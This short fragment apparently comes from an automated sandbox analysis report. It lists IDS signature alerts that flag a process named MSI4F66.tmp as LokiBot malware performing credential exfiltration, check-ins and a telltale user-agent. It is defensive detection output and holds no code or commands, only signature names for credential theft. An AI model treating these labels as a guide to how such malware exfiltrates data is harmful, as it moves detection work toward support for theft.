ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1588
MSI4F66.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
4 ETPRO signatures available at the full report
No debug info